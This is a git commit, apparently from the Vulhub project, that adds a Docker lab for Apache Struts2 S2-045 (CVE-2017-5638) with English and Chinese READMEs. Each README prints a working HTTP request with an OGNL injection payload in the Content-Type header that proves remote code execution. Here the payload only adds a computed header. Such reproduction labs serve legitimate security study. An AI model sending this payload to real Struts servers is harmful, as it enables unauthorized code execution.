first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
struts2/s2-045/1.png
Normal file
BIN
struts2/s2-045/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 64 KiB |
42
struts2/s2-045/README.md
Normal file
42
struts2/s2-045/README.md
Normal file
@@ -0,0 +1,42 @@
|
||||
# S2-045 Remote Code Execution Vulnerablity(CVE-2017-5638)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Affected Version: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
|
||||
|
||||
References:
|
||||
|
||||
- http://struts.apache.org/docs/s2-045.html
|
||||
- https://nsfocusglobal.com/apache-struts2-remote-code-execution-vulnerability-s2-045/
|
||||
|
||||
## Setup
|
||||
|
||||
Execute the following command to start the Struts2 2.3.30:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the container is running, visit `http://your-ip:8080` that you can see an example of the upload page.
|
||||
|
||||
## Exploitation
|
||||
|
||||
Verify the vulnerability by following request:
|
||||
|
||||
```
|
||||
POST / HTTP/1.1
|
||||
Host: localhost:8080
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.8,es;q=0.6
|
||||
Connection: close
|
||||
Content-Length: 0
|
||||
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data
|
||||
|
||||
|
||||
```
|
||||
|
||||
`233*233` has been successfully executed:
|
||||
|
||||
|
||||
39
struts2/s2-045/README.zh-cn.md
Normal file
39
struts2/s2-045/README.zh-cn.md
Normal file
@@ -0,0 +1,39 @@
|
||||
# S2-045 远程代码执行漏洞(CVE-2017-5638)
|
||||
|
||||
影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
|
||||
|
||||
漏洞详情:
|
||||
|
||||
- http://struts.apache.org/docs/s2-045.html
|
||||
- https://blog.csdn.net/u011721501/article/details/60768657
|
||||
- https://paper.seebug.org/247/
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
执行如下命令启动struts2 2.3.30:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,访问`http://your-ip:8080`即可看到上传页面。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
直接发送如下数据包,可见`233*233`已成功执行:
|
||||
|
||||
```
|
||||
POST / HTTP/1.1
|
||||
Host: localhost:8080
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.8,es;q=0.6
|
||||
Connection: close
|
||||
Content-Length: 0
|
||||
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
||||
6
struts2/s2-045/docker-compose.yml
Normal file
6
struts2/s2-045/docker-compose.yml
Normal file
@@ -0,0 +1,6 @@
|
||||
version: '2'
|
||||
services:
|
||||
struts2:
|
||||
image: vulhub/struts2:2.3.30
|
||||
ports:
|
||||
- "8080:8080"
|
||||
Reference in New Issue
Block a user